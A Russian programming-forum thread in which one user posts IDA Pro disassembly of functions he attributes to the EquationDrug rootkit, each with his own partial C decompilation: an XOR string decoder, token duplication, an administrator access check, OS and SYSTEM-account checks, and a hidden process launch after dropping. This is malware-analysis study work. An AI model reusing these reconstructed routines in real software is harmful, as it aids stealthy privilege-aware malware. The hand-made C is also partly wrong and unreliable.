Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > C/C++ программирование > Общие вопросы C/C++
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 25.02.2015, 07:36   #1
challengerr
Участник клуба
 
Аватар для challengerr
 
Регистрация: 30.07.2008
Сообщений: 1,639
По умолчанию Декомпилирование кода для исследования руткитов

Дизассемблирование с помощью IDA Pro

XOR применяется в криптографии для генерировании ключа в шифрах Эль-Гамаля, RSA, эллиптической криптографии habrahabr.ru/post/183462/


XOR (exclusive OR)
0 0 0
0 1 1
1 0 1
1 1 0

путаюсь постоянно

Для чего нужен XOR в конструкции
Код:
movsx	ecx, byte ptr [eax]
xor	ecx, [ebp+arg_4]
movsx помещает в 32-битный регистр процессора ecx один 8 битный байт из eax,
но для чего этот байт XORом сравнивается с arg_4?


Об операции прыжка (перехода)
jmp - переход происходит всегда

Код:
mov eax, 6
mov ebx, 6
cmp eax, ebx
jge l2 ; если eax >= ebx  jge исполняется
Код:
cmp eax, 0
jz l1
если eax == 0 jz исполняется
Код:
cmp eax, 0
jnz l1
если eax != 0 jnz исполняется
Декомпилированный код:
Код:
void sub_401000(char * a, int b)
{
DWORD var_4 = strlen(a);
DWORD var_8 = 0;

for ( ; var_8 < var_4; var_8++)
{
arg_0 += var_8;

//movsx	ecx, byte ptr [eax]
//xor	ecx, [ebp+arg_4]

arg0 += var_8;
}
return;
}


Листинг из IDA Pro:
Код:
/*
; Attributes: bp-based frame

; int __cdecl sub_401000(char *,int)
sub_401000 proc	near

var_8= dword ptr -8
var_4= dword ptr -4 // локальные переменные функции

arg_0= dword ptr  8 // аргументы вызова функции
arg_4= dword ptr  0Ch

push	ebp 
mov	ebp, esp 
sub	esp, 8 

mov	eax, [ebp+arg_0]
push	eax		; char *
call	strlen
add	esp, 4
mov	[ebp+var_4], eax

//var_4 = strlen(arg_0);

mov	[ebp+var_8], 0

//var_8 = 0;

// цикл

jmp	short loc_401027

loc_40101E:
mov	ecx, [ebp+var_8]
add	ecx, 1
mov	[ebp+var_8], ecx

//var_8++;

loc_401027:
mov	edx, [ebp+var_8]
cmp	edx, [ebp+var_4]
jge	short loc_401045

var_8 < var_4

mov	eax, [ebp+arg_0]
add	eax, [ebp+var_8]

arg_0 += var_8;

movsx	ecx, byte ptr [eax]
xor	ecx, [ebp+arg_4]

?

mov	edx, [ebp+arg_0]
add	edx, [ebp+var_8]

arg0 += var_8;

mov	[edx], cl

?

jmp	short loc_40101E

//

for ( ; var_8 < var_4; var_8++)
{
arg_0 += var_8;

}


loc_401045:
mov	esp, ebp
pop	ebp

retn

return;

sub_401000 endp

align 10h
*/

Код получения функций ядра операционной системы примерно
Руткит (EquationDrug группа Equation) импортирует функцию ядра RtlImageDirectoryEntryToData примерно следующим образом

Код:
hLibModule = LoadLibraryA("ntdll.dll");
typedef PVOID (*PROC1)(PVOID, BOOLEAN, USHORT, PULONG);
PROC1 proc = (PROC1) GetProcAddress(hLibModule, "RtlImageDirectoryEntryToData");
FreeLibrary(hLibModule);
"SPACE.THE FINAL FRONTIER.This's a voyage of starship Enterprise. It's 5-year mission to explore strange new worlds,to seek out new life and civilizations,to boldly go where no man has gone before"

Последний раз редактировалось challengerr; 25.02.2015 в 08:33.
challengerr вне форума Ответить с цитированием
Старый 25.02.2015, 08:28   #2
challengerr
Участник клуба
 
Аватар для challengerr
 
Регистрация: 30.07.2008
Сообщений: 1,639
По умолчанию

Получение токена (EquationDrug группа Equation)

Код:
HANDLE sub_402330(DWORD dwDesiredAccess,int a,SECURITY_IMPERSONATION_LEVEL	ImpersonationLevel)
{
HANDLE hObject = 0;
HANDLE phNewToken;
if (!OpenThreadToken(GetCurrentThread(), dwDesiredAccess, 1, &hObject))
{
if (GetLastError()== 0x3F0)
{
if (OpenProcessToken(GetCurrentProcess(), dwDesiredAccess, &hObject))
{
DuplicateTokenEx(hObject, dwDesiredAccess, 0, ImpersonationLevel, (TOKEN_TYPE )2 , &phNewToken );
printf("phNewToken: %x\n", phNewToken);
var_30t = phNewToken;
return (var_30t);
}
else
{
var_4= 0xFFFFFFFF;
return (0);
}
}
}
else
{
var_28t=hObject;
var_4= 0xFFFFFFFF;
return (var_28t);
}
}
Код:

/*

; Attributes: bp-based frame

; int __cdecl sub_402330(DWORD dwDesiredAccess,int,SECURITY_IMPERSONATION_LEVEL	ImpersonationLevel)
sub_402330 proc	near

var_34=	dword ptr -34h
var_30=	dword ptr -30h
var_2C=	dword ptr -2Ch
var_28=	dword ptr -28h
phNewToken= dword ptr -24h
var_20=	dword ptr -20h
hObject= dword ptr -1Ch
var_18=	dword ptr -18h
var_10=	dword ptr -10h
var_4= dword ptr -4
dwDesiredAccess= dword ptr  8
arg_4= dword ptr  0Ch
ImpersonationLevel= dword ptr  10h

push	ebp
mov	ebp, esp
push	0FFFFFFFFh
push	offset unk_409278
push	offset sub_407BC0
mov	eax, large fs:0
push	eax
mov	large fs:0, esp
add	esp, 0FFFFFFDCh
push	ebx
push	esi
push	edi
mov	[ebp+var_18], esp
mov	[ebp+var_4], 0
mov	[ebp+hObject], 0

var_18=0;
var_4=0;
hObject=0;

lea	eax, [ebp+hObject]
push	eax		; TokenHandle
push	1		; OpenAsSelf
mov	ecx, [ebp+dwDesiredAccess]
push	ecx		; DesiredAccess
call	ds:GetCurrentThread
push	eax		; ThreadHandle
call	ds:OpenThreadToken ; Open the access token associated with a thread

if (!OpenThreadToken(GetCurrentThread(), dwDesiredAccess, 1, &hObject))
{
jz	short loc_402394
}
else
{
var_28=hObject;
var_4= 0xFFFFFFFF;
}

test	eax, eax
jz	short loc_402394
mov	edx, [ebp+hObject]
mov	[ebp+var_28], edx
mov	[ebp+var_4], 0FFFFFFFFh
mov	eax, [ebp+var_28]
jmp	loc_40245A

loc_402394:
call	ds:GetLastError
cmp	eax, 3F0h
jnz	loc_40243F

cmp	[ebp+arg_4], 0
jz	short loc_4023B4
mov	[ebp+var_2C], 2
jmp	short loc_4023BA

loc_4023B4:
mov	eax, [ebp+dwDesiredAccess]
mov	[ebp+var_2C], eax

loc_4023BA:
mov	ecx, [ebp+var_2C]
mov	[ebp+var_20], ecx
lea	edx, [ebp+hObject]
push	edx		; TokenHandle
mov	eax, [ebp+var_20]
push	eax		; DesiredAccess
call	ds:GetCurrentProcess
push	eax		; ProcessHandle
call	ds:OpenProcessToken ; Open the access token associated with a process

OpenProcessToken(GetCurrentProcess(), DesiredAccess, &hObject);


test	eax, eax
jz	short loc_40243F
cmp	[ebp+arg_4], 0
jz	short loc_40242D
lea	ecx, [ebp+phNewToken]
push	ecx		; phNewToken
push	2		; TokenType
mov	edx, [ebp+ImpersonationLevel]
push	edx		; ImpersonationLevel
push	0		; lpTokenAttributes
mov	eax, [ebp+dwDesiredAccess]
push	eax		; dwDesiredAccess
mov	ecx, [ebp+hObject]
push	ecx		; hExistingToken
call	ds:DuplicateTokenEx

DuplicateTokenEx(hObject, dwDesiredAccess, 0, ImpersonationLevel, 2 , &phNewToken);

test	eax, eax
jnz	short loc_402404
mov	[ebp+phNewToken], 0

loc_402404:
cmp	[ebp+hObject], 0
jz	short loc_40241B
mov	edx, [ebp+hObject]
push	edx		; hObject
call	ds:CloseHandle
mov	[ebp+hObject], 0

CloseHandle(hObject);
hObject=0;

loc_40241B:
mov	eax, [ebp+phNewToken]
mov	[ebp+var_30], eax
mov	[ebp+var_4], 0FFFFFFFFh
mov	eax, [ebp+var_30]
jmp	short loc_40245A

var_30=phNewToken;
var_4= 0xFFFFFFFF;


loc_40242D:
mov	ecx, [ebp+hObject]
mov	[ebp+var_34], ecx
mov	[ebp+var_4], 0FFFFFFFFh
mov	eax, [ebp+var_34]
jmp	short loc_40245A

loc_40243F:
mov	[ebp+var_4], 0FFFFFFFFh
jmp	short loc_402458
mov	eax, 1
retn
mov	esp, [ebp-18h]
mov	dword ptr [ebp-4], 0FFFFFFFFh

loc_402458:
xor	eax, eax

loc_40245A:
mov	ecx, [ebp+var_10]
mov	large fs:0, ecx
pop	edi
pop	esi
pop	ebx
mov	esp, ebp
pop	ebp
retn
sub_402330 endp

align 10h
"SPACE.THE FINAL FRONTIER.This's a voyage of starship Enterprise. It's 5-year mission to explore strange new worlds,to seek out new life and civilizations,to boldly go where no man has gone before"

Последний раз редактировалось challengerr; 25.02.2015 в 08:33.
challengerr вне форума Ответить с цитированием
Старый 25.02.2015, 08:33   #3
challengerr
Участник клуба
 
Аватар для challengerr
 
Регистрация: 30.07.2008
Сообщений: 1,639
По умолчанию

Проверка прав доступа (EquationDrug группа Equation)
Время действия - с 2003 года руткит режима ядра

Код:
void sub_4021B0(HANDLE ClientToken,PSID pSid,LPBOOL AccessStatus)
{
ACL var_B0;
PACL pDacl; 
DWORD PrivilegeSetLength; 
GENERIC_MAPPING GenericMapping;
_PRIVILEGE_SET PrivilegeSet;
SECURITY_DESCRIPTOR  pSecurityDescriptor;
SID pGroup;
DWORD GrantedAccess;
DWORD var_1C;

ClientToken = sub_402330(8, 1, (SECURITY_IMPERSONATION_LEVEL) 1);
pDacl = &var_B0;
InitializeAcl(pDacl, 0x54, 2);
printf("error:%x %d\n", GetLastError(), GetLastError()); 
AddAccessAllowedAce(pDacl, 2, 1, pSid); 
SetSecurityDescriptorOwner(&pSecurityDescriptor, &pGroup, 0);
SetSecurityDescriptorGroup(&pSecurityDescriptor, &pGroup, 0);
SetSecurityDescriptorDacl(&pSecurityDescriptor, 1, pDacl, 0);
GenericMapping.GenericRead = 0;
GenericMapping.GenericWrite = 0;
GenericMapping.GenericExecute = 0;
GenericMapping.GenericAll = 0;
PrivilegeSetLength = 0x14;
var_1C = AccessCheck(&pSecurityDescriptor, ClientToken, 1, &GenericMapping, &PrivilegeSet, &PrivilegeSetLength, &GrantedAccess, AccessStatus);

}
Код:

/*
; int __stdcall	sub_4021B0(HANDLE ClientToken,PSID pSid,LPBOOL AccessStatus)
sub_4021B0 proc	near

PrivilegeSetLength= dword ptr -0C4h
GenericMapping=	GENERIC_MAPPING	ptr -0C0h
var_B0=	dword ptr -0B0h
pGroup=	byte ptr -58h
var_55=	byte ptr -55h
var_54=	byte ptr -54h
var_53=	byte ptr -53h
var_52=	byte ptr -52h
var_51=	byte ptr -51h
var_50=	dword ptr -50h
pDacl= dword ptr -4Ch
pSecurityDescriptor= dword ptr -48h
PrivilegeSet= _PRIVILEGE_SET ptr -34h
GrantedAccess= dword ptr -20h
var_1C=	dword ptr -1Ch
var_18=	dword ptr -18h
var_10=	dword ptr -10h
var_4= dword ptr -4
ClientToken= dword ptr	8
pSid= dword ptr	 0Ch
AccessStatus= dword ptr	 10h

push	ebp
mov	ebp, esp
push	0FFFFFFFFh
push	offset unk_409268
push	offset sub_407BC0
mov	eax, large fs:0
push	eax
mov	large fs:0, esp
add	esp, 0FFFFFF4Ch
push	ebx
push	esi
push	edi
mov	[ebp+var_18], esp
mov	[ebp+var_1C], 0
mov	[ebp+var_4], 0
cmp	[ebp+ClientToken], 0
jnz	short loc_4021FE
push	1		; ImpersonationLevel
push	1		; int
push	8		; dwDesiredAccess
call	sub_402330
add	esp, 0Ch
mov	[ebp+ClientToken], eax

sub_402330(8, 1, 1);

loc_4021FE:
cmp	[ebp+ClientToken], 0
jnz	short loc_402210
mov	[ebp+var_1C], 0
jmp	loc_4022FD

loc_402210:
lea	eax, [ebp+var_B0]
mov	[ebp+pDacl], eax
push	2		; dwAclRevision
push	54h		; nAclLength
mov	ecx, [ebp+pDacl]
push	ecx		; pAcl
call	ds:InitializeAcl

pDacl = &var_B0;
InitializeAcl(pDacl, 0x54, 2);

mov	edx, [ebp+pSid]
push	edx		; pSid
push	1		; AccessMask
push	2		; dwAceRevision
mov	eax, [ebp+pDacl]
push	eax		; pAcl
call	ds:AddAccessAllowedAce

AddAccessAllowedAce(pDacl, 2, 1, pSid); 

push	1		; dwRevision
lea	ecx, [ebp+pSecurityDescriptor]
push	ecx		; pSecurityDescriptor
call	ds:InitializeSecurityDescriptor
mov	[ebp+pGroup], 1
mov	byte ptr [ebp-57h], 1
mov	byte ptr [ebp-56h], 0
mov	[ebp+var_55], 0
mov	[ebp+var_54], 0
mov	[ebp+var_53], 0
mov	[ebp+var_52], 0
mov	[ebp+var_51], 1
mov	[ebp+var_50], 0
push	0		; bOwnerDefaulted
lea	edx, [ebp+pGroup]
push	edx		; pOwner
lea	eax, [ebp+pSecurityDescriptor]
push	eax		; pSecurityDescriptor
call	ds:SetSecurityDescriptorOwner

SetSecurityDescriptorOwner(&pSecurityDescriptor, &pGroup, 0);

push	0		; bGroupDefaulted
lea	ecx, [ebp+pGroup]
push	ecx		; pGroup
lea	edx, [ebp+pSecurityDescriptor]
push	edx		; pSecurityDescriptor
call	ds:SetSecurityDescriptorGroup

SetSecurityDescriptorGroup(&pSecurityDescriptor, &pGroup, 0);

push	0		; bDaclDefaulted
mov	eax, [ebp+pDacl]
push	eax		; pDacl
push	1		; bDaclPresent
lea	ecx, [ebp+pSecurityDescriptor]
push	ecx		; pSecurityDescriptor
call	ds:SetSecurityDescriptorDacl

SetSecurityDescriptorDacl(&pSecurityDescriptor, 1, pDacl, 0);

mov	[ebp+GenericMapping.GenericRead], 0
mov	[ebp+GenericMapping.GenericWrite], 0
mov	[ebp+GenericMapping.GenericExecute], 0
mov	[ebp+GenericMapping.GenericAll], 1
mov	[ebp+PrivilegeSetLength], 14h


mov	edx, [ebp+AccessStatus]
push	edx		; AccessStatus
lea	eax, [ebp+GrantedAccess]
push	eax		; GrantedAccess
lea	ecx, [ebp+PrivilegeSetLength]
push	ecx		; PrivilegeSetLength
lea	edx, [ebp+PrivilegeSet]
push	edx		; PrivilegeSet
lea	eax, [ebp+GenericMapping]
push	eax		; GenericMapping
push	1		; DesiredAccess
mov	ecx, [ebp+ClientToken]
push	ecx		; ClientToken
lea	edx, [ebp+pSecurityDescriptor]
push	edx		; pSecurityDescriptor
call	ds:AccessCheck	; Check	a client's access to an object
mov	[ebp+var_1C], eax

loc_4022FD:
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_402316
mov eax, 1
retn
mov esp, [ebp-18h]
mov dword ptr [ebp-4], 0FFFFFFFFh

loc_402316:
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 0Ch
sub_4021B0 endp

align 10h

*/
"SPACE.THE FINAL FRONTIER.This's a voyage of starship Enterprise. It's 5-year mission to explore strange new worlds,to seek out new life and civilizations,to boldly go where no man has gone before"
challengerr вне форума Ответить с цитированием
Старый 25.02.2015, 08:35   #4
challengerr
Участник клуба
 
Аватар для challengerr
 
Регистрация: 30.07.2008
Сообщений: 1,639
По умолчанию

Получение информации о версии операционной системы (EquationDrug группа Equation)


Код:
void sub_401920()
{
_OSVERSIONINFOA VersionInformation;
_SID_IDENTIFIER_AUTHORITY pIdentifierAuthority;
DWORD AccessStatus ;//AccessStatus= dword ptr	-20h
PSID pSid ;//pSid= dword ptr	-1Ch
DWORD var_18 ;//var_18=	dword ptr -18h
DWORD var_10 ;//var_10=	dword ptr -10h
DWORD var_4 ;//var_4= dword ptr -4

AccessStatus = 0;
pIdentifierAuthority.Value[0] = 0;
pIdentifierAuthority.Value[1] = 0;
pIdentifierAuthority.Value[2] = 0;
pIdentifierAuthority.Value[3] = 0;
pIdentifierAuthority.Value[4] = 0;
pIdentifierAuthority.Value[5] = 0;
pSid = 0;
var_4 = 1;
VersionInformation.dwOSVersionInfoSize = 0x94;
GetVersionExA(&VersionInformation);
AccessStatus = 0;

printf("VersionInformation.dwPlatformId: %d\n", VersionInformation.dwPlatformId);
printf("VersionInformation.dwMajorVersion : %d\n", VersionInformation.dwMajorVersion );

if (VersionInformation.dwPlatformId == 1) 
{ 
AccessStatus = 1; 
//sub_401A38();
}
else if (VersionInformation.dwPlatformId == 2)
{
if (VersionInformation.dwMajorVersion >= 4)
{
AccessStatus = AllocateAndInitializeSid(&pIdentifierAuthority, 2, 0x20, 0x220, 0,0,0,0,0,0,&pSid);
printf("error:%x %d AccessStatus:%x\n", GetLastError(), GetLastError(), AccessStatus); 
if (AccessStatus != 0)
{
sub_4021B0(0, &pSid,  (LPBOOL)&AccessStatus);
//FreeSid(&pSid);
}

}
}

}
Код:
/*
sub_401920 proc	near

VersionInformation= _OSVERSIONINFOA ptr	-0C0h
pIdentifierAuthority= _SID_IDENTIFIER_AUTHORITY	ptr -28h
AccessStatus= dword ptr	-20h
pSid= dword ptr	-1Ch
var_18=	dword ptr -18h
var_10=	dword ptr -10h
var_4= dword ptr -4

; FUNCTION CHUNK AT 00401A50 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00401A69 SIZE 00000014 BYTES

push	ebp
mov	ebp, esp
push	0FFFFFFFFh
push	offset unk_4091F8
push	offset sub_407BC0
mov	eax, large fs:0
push	eax
mov	large fs:0, esp
add	esp, 0FFFFFF50h
push	ebx
push	esi
push	edi
mov	[ebp+var_18], esp
mov	[ebp+AccessStatus], 0
mov	[ebp+pIdentifierAuthority.Value], 0
mov	[ebp+pIdentifierAuthority.Value+1], 0
mov	[ebp+pIdentifierAuthority.Value+2], 0
mov	[ebp+pIdentifierAuthority.Value+3], 0
mov	[ebp+pIdentifierAuthority.Value+4], 0
mov	[ebp+pIdentifierAuthority.Value+5], 5
mov	[ebp+pSid], 0
mov	[ebp+var_4], 0
mov	[ebp+var_4], 1
mov	[ebp+VersionInformation.dwOSVersionInfoSize], 94h
lea	eax, [ebp+VersionInformation]
push	eax		; lpVersionInformation
call	ds:GetVersionExA ; Get extended	information about the
			; version of the operating system
test	eax, eax
jnz	short loc_4019A4
mov	[ebp+AccessStatus], 0
jmp	loc_401A2A

loc_4019A4:
cmp	[ebp+VersionInformation.dwPlatformId], 1
jnz	short loc_4019B6
mov	[ebp+AccessStatus], 1
jmp	short loc_401A2A

loc_4019B6:
cmp	[ebp+VersionInformation.dwPlatformId], 2
jnz	short loc_4019D1
cmp	[ebp+VersionInformation.dwMajorVersion], 4
jnz	short loc_4019D1
mov	[ebp+AccessStatus], 0
jmp	short loc_401A2A

loc_4019D1:
lea	ecx, [ebp+pSid]
push	ecx		; pSid
push	0		; nSubAuthority7
push	0		; nSubAuthority6
push	0		; nSubAuthority5
push	0		; nSubAuthority4
push	0		; nSubAuthority3
push	0		; nSubAuthority2
push	220h		; nSubAuthority1
push	20h		; nSubAuthority0
push	2		; nSubAuthorityCount
lea	edx, [ebp+pIdentifierAuthority]
push	edx		; pIdentifierAuthority
call	ds:AllocateAndInitializeSid ; Allocate and initializes a security
			; identifier with up to	eight subauthorities
mov	[ebp+AccessStatus], eax
cmp	[ebp+AccessStatus], 0
jz	short loc_401A2A
lea	eax, [ebp+AccessStatus]
push	eax		; AccessStatus
mov	ecx, [ebp+pSid]
push	ecx		; pSid
push	0		; ClientToken
call	sub_4021B0
test	eax, eax
jnz	short loc_401A19
mov	[ebp+AccessStatus], 0
jmp	short loc_401A2A

loc_401A19:
mov	edx, [ebp+pSid]
push	edx		; pSid
call	ds:FreeSid
mov	[ebp+pSid], 0

loc_401A2A:
mov	[ebp+var_4], 0
call	sub_401A38
jmp	short loc_401A50
sub_401920 endp
*/
"SPACE.THE FINAL FRONTIER.This's a voyage of starship Enterprise. It's 5-year mission to explore strange new worlds,to seek out new life and civilizations,to boldly go where no man has gone before"
challengerr вне форума Ответить с цитированием
Старый 25.02.2015, 08:38   #5
challengerr
Участник клуба
 
Аватар для challengerr
 
Регистрация: 30.07.2008
Сообщений: 1,639
По умолчанию

Создание процесса руткита после дропа через дроппера (EquationDrug)

Код:
void sub_401810() 
{
struct _STARTUPINFOA StartupInfo;
struct _PROCESS_INFORMATION ProcessInformation;
char* var_8;
DWORD var_5;
DWORD var_4;
char* lpApplicationName;

lpApplicationName = new char[24];
var_8 = new char[4];
var_8[0] = 0x51;
var_8[1] = 0x1B;
var_8[2] = 0x13;
var_8[3] = 0;
var_5 = 0x13;
var_4 = 0;
sub_401050(var_8);
strstr(lpApplicationName, &var_8);
LoadLibraryA(lpApplicationName);
GetLastError();
GetStartupInfoA(&StartupInfo);
StartupInfo.wShowWindow = 0;
StartupInfo.dwFlags = 1;
CreateProcessA(lpApplicationName, 0,0,0,1,0,0,0,&StartupInfo, &ProcessInformation);

}

Код:
/*
sub_401810 proc	near


StartupInfo= _STARTUPINFOA ptr -68h
ProcessInformation= _PROCESS_INFORMATION ptr -20h
var_10=	dword ptr -10h
var_C= dword ptr -0Ch
var_8= byte ptr	-8
var_5= byte ptr	-5
var_4= byte ptr	-4
lpApplicationName= dword ptr  8

push	ebp
mov	ebp, esp
sub	esp, 68h
mov	[ebp+var_8], 51h
mov	byte ptr [ebp-7], 1Bh
mov	byte ptr [ebp-6], 13h
mov	[ebp+var_5], 13h
mov	[ebp+var_4], 0

var_8 = new char[4];

var_8[0] = 0x51;
var_8[1] = 0x1B;
var_8[2] = 0x13;
var_8[3] = 0;
var_5 = 0x13;
var_4 = 0;

mov	byte ptr [ebp-7], 1Bh
mov	byte ptr [ebp-6], 13h
mov	[ebp+var_5], 13h
mov	[ebp+var_4], 0

lea	eax, [ebp+var_8]
push	eax		; char *
call	sub_401050

sub_401050(&var_8);

add	esp, 4
lea	ecx, [ebp+var_8]
push	ecx		; char *
mov	edx, [ebp+lpApplicationName]
push	edx		; char *
call	ds:strstr

strstr(lpApplicationName, &var_8);

add	esp, 8
test	eax, eax
jz	short loc_401874
mov	eax, [ebp+lpApplicationName]
push	eax		; lpLibFileName
call	ds:LoadLibraryA

LoadLibraryA(lpApplicationName);

mov	[ebp+var_C], eax
cmp	[ebp+var_C], 0
jnz	short loc_401872
call	ds:GetLastError

GetLastError();

var_10 = GetLastError()

mov	[ebp+var_10], eax
cmp	[ebp+var_10], 45Ah

if (var10 != 0x45A)
{ jz	short loc_401872 }

jz	short loc_401872
jmp	short loc_4018AB

loc_401872:
jmp	short loc_4018AB

loc_401874:
lea	ecx, [ebp+StartupInfo]
push	ecx		; lpStartupInfo
call	ds:GetStartupInfoA

GetStartupInfoA(&StartupInfo);

mov	[ebp+StartupInfo.wShowWindow], 0
mov	[ebp+StartupInfo.dwFlags], 1

StartupInfo.wShowWindow = 0;
StartupInfo.dwFlags = 1;

lea	edx, [ebp+ProcessInformation]
push	edx		; lpProcessInformation
lea	eax, [ebp+StartupInfo]
push	eax		; lpStartupInfo
push	0		; lpCurrentDirectory
push	0		; lpEnvironment
push	0		; dwCreationFlags
push	1		; bInheritHandles
push	0		; lpThreadAttributes
push	0		; lpProcessAttributes
push	0		; lpCommandLine
mov	ecx, [ebp+lpApplicationName]
push	ecx		; lpApplicationName
call	ds:CreateProcessA

CreateProcessA(lpApplicationName, 0,0,0,1,0,0,0,&StartupInfo, &ProcessInformation);

loc_4018AB:
mov	esp, ebp
pop	ebp
retn
sub_401810 endp

align 10h
*/
Код:
void sub_401050(char * arg_0) 
{ 
sub_401000(arg_0, 0x7f); 
}
Код:
void sub_401070(char * arg_0) 
{ 
sub_401000(arg_0, 0x3c); 
}
Код:
void sub_401760() 
{
//LocalFree(hMem);
//FreeLibrary(hLibModule);
}
Код:
void sub_401A38() 
{ 
//if (pSid==0)
//return;
//FreeSid(pSid);
}
"SPACE.THE FINAL FRONTIER.This's a voyage of starship Enterprise. It's 5-year mission to explore strange new worlds,to seek out new life and civilizations,to boldly go where no man has gone before"
challengerr вне форума Ответить с цитированием
Старый 25.02.2015, 08:39   #6
challengerr
Участник клуба
 
Аватар для challengerr
 
Регистрация: 30.07.2008
Сообщений: 1,639
По умолчанию

Получение системного времени (EquationDrug)

Код:
void sub_4018B0()
{
_SYSTEMTIME SystemTime;
GetSystemTime(&SystemTime);
}
Код:

/*
sub_4018B0 proc	near

var_14=	dword ptr -14h
SystemTime= _SYSTEMTIME	ptr -10h

push	ebp
mov	ebp, esp
sub	esp, 14h
lea	eax, [ebp+SystemTime]
push	eax		; lpSystemTime
call	ds:GetSystemTime
movzx	eax, [ebp+SystemTime.wSecond]
cdq
mov	ecx, 0Ah
idiv	ecx
mov	[ebp+var_14], edx
fild	[ebp+var_14]
fdiv	ds:dbl_4091F0
mov	esp, ebp
pop	ebp
retn
sub_4018B0 endp

align 10h

*/
"SPACE.THE FINAL FRONTIER.This's a voyage of starship Enterprise. It's 5-year mission to explore strange new worlds,to seek out new life and civilizations,to boldly go where no man has gone before"
challengerr вне форума Ответить с цитированием
Старый 25.02.2015, 08:42   #7
challengerr
Участник клуба
 
Аватар для challengerr
 
Регистрация: 30.07.2008
Сообщений: 1,639
По умолчанию

Получение сведений о правах доступа эккаунта пользователя (EquationDrug)

Код:
void sub_401A80()
{

var_18 = 0;
var_24 = 0xFFFFFFFF;
var_1C = 0;
Sid = 0;
var_4 = 1;
nSize = 0x100;
GetUserNameW(&Buffer, &nSize);
var_24 = 0xFFFFFFFF;
pIdentifierAuthority.Value[0]=0;
pIdentifierAuthority.Value[1]=0;
pIdentifierAuthority.Value[2]=0;
pIdentifierAuthority.Value[3]=0;
pIdentifierAuthority.Value[4]=0;
pIdentifierAuthority.Value[5]=5;
Sid = &var_90;
AllocateAndInitializeSid(&pIdentifierAuthority, 1, 0x12, 0,0,0,0,0,0,0,&Sid);
memset(&Name, 0, 0x82);
cbName = 0x40;
cbReferencedDomainName = 0x80;
LookupAccountSidW(0, Sid, &Name, &cbName, &ReferencedDomainName, &cbReferencedDomainName, &peUse);
wcscmp(&Name, &Buffer);

}
Код:
/*
sub_401A80 proc	near

cbReferencedDomainName=	dword ptr -444h
Buffer=	word ptr -440h
cbName=	dword ptr -234h
pIdentifierAuthority= _SID_IDENTIFIER_AUTHORITY	ptr -230h
ReferencedDomainName= word ptr -228h
Name= word ptr -120h
nSize= dword ptr -94h
var_90=	dword ptr -90h
peUse= dword ptr -28h
var_24=	dword ptr -24h
Sid= dword ptr -20h
var_1C=	dword ptr -1Ch
var_18=	dword ptr -18h
var_10=	dword ptr -10h
var_4= dword ptr -4

; FUNCTION CHUNK AT 00401C13 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00401C33 SIZE 00000014 BYTES

push	ebp
mov	ebp, esp
push	0FFFFFFFFh
push	offset unk_409210
push	offset sub_407BC0
mov	eax, large fs:0
push	eax
mov	large fs:0, esp
add	esp, 0FFFFFBCCh
push	ebx
push	esi
push	edi
mov	[ebp+var_18], esp
mov	[ebp+var_24], 0FFFFFFFFh
mov	[ebp+var_1C], 0
mov	[ebp+Sid], 0
mov	[ebp+var_4], 0
mov	[ebp+var_4], 1
mov	[ebp+nSize], 100h

var_18 = 0;
var_24 = 0xFFFFFFFF;
var_1C = 0;
Sid = 0;
var_4 = 1;
nSize = 0x100;

lea	eax, [ebp+nSize]
push	eax		; nSize
lea	ecx, [ebp+Buffer]
push	ecx		; lpBuffer
call	ds:GetUserNameW

GetUserNameW(&Buffer, &nSize);

test	eax, eax
jnz	short loc_401AFA
mov	[ebp+var_24], 0FFFFFFFFh

var_24 = 0xFFFFFFFF;

jmp	loc_401BE7

loc_401AFA:
mov	[ebp+pIdentifierAuthority.Value], 0
mov	[ebp+pIdentifierAuthority.Value+1], 0
mov	[ebp+pIdentifierAuthority.Value+2], 0
mov	[ebp+pIdentifierAuthority.Value+3], 0
mov	[ebp+pIdentifierAuthority.Value+4], 0
mov	[ebp+pIdentifierAuthority.Value+5], 5

pIdentifierAuthority.Value[0]=0;
pIdentifierAuthority.Value[1]=0;
pIdentifierAuthority.Value[2]=0;
pIdentifierAuthority.Value[3]=0;
pIdentifierAuthority.Value[4]=0;
pIdentifierAuthority.Value[5]=5;

lea	edx, [ebp+var_90]
mov	[ebp+Sid], edx

Sid = &var_90;

lea	eax, [ebp+Sid]
push	eax		; pSid
push	0		; nSubAuthority7
push	0		; nSubAuthority6
push	0		; nSubAuthority5
push	0		; nSubAuthority4
push	0		; nSubAuthority3
push	0		; nSubAuthority2
push	0		; nSubAuthority1
push	12h		; nSubAuthority0
push	1		; nSubAuthorityCount
lea	ecx, [ebp+pIdentifierAuthority]
push	ecx		; pIdentifierAuthority
call	ds:AllocateAndInitializeSid ; Allocate and initializes a security
			; identifier with up to	eight subauthorities

AllocateAndInitializeSid(&pIdentifierAuthority, 1, 0x12, 0,0,0,0,0,0,0,&Sid);

mov	[ebp+var_1C], eax
cmp	[ebp+var_1C], 0
jnz	short loc_401B65
mov	[ebp+var_24], 0FFFFFFFFh
jmp	loc_401BE7

loc_401B65:		; size_t
push	82h
push	0		; int
lea	edx, [ebp+Name]
push	edx		; void *
call	memset
add	esp, 0Ch

memset(&Name, 0, 0x82);

mov	[ebp+cbName], 40h
mov	[ebp+cbReferencedDomainName], 80h

cbName = 0x40;
cbReferencedDomainName = 0x80;

lea	eax, [ebp+peUse]
push	eax		; peUse
lea	ecx, [ebp+cbReferencedDomainName]
push	ecx		; cbReferencedDomainName
lea	edx, [ebp+ReferencedDomainName]
push	edx		; ReferencedDomainName
lea	eax, [ebp+cbName]
push	eax		; cbName
lea	ecx, [ebp+Name]
push	ecx		; Name
mov	edx, [ebp+Sid]
push	edx		; Sid
push	0		; lpSystemName
call	ds:LookupAccountSidW

LookupAccountSidW(0, Sid, &Name, &cbName, &ReferencedDomainName, &cbReferencedDomainName, &peUse);

test	eax, eax
jnz	short loc_401BC8
mov	[ebp+var_24], 0FFFFFFFFh
jmp	short loc_401BE7

loc_401BC8:
lea	eax, [ebp+Buffer]
push	eax		; wchar_t *
lea	ecx, [ebp+Name]
push	ecx		; wchar_t *
call	ds:wcscmp

wcscmp(&Name, &Buffer);
